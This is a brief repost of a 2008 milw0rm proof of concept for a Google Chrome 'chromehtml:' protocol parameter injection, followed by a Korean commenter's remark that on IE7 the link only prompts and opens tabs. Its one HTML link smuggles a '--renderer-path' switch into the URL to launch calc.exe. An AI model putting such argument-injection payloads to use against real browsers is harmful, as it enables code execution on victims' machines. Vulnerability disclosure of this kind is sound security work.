Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome, Microsoft Windows XP SP3
List of command line switches:
Original url: http://retrogod.altervista.org/9sg_chrome.html
click the following link with IE while monitoring with procmon
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>
# milw0rm.com [2008-12-23]
밀웜에 구글 크롬 취약점이 올라왔더군요...
IE 8 bata 2, Google Chrome, Microsoft Windows XP SP3
IE 8 bata 2 깔기 귀찮아서 테스트는 안해봤는데 IE7에서는 실행하겠냐고 묻기만 하고 실행되지 않고 탭만 계속 늘어나더군요..ㅋ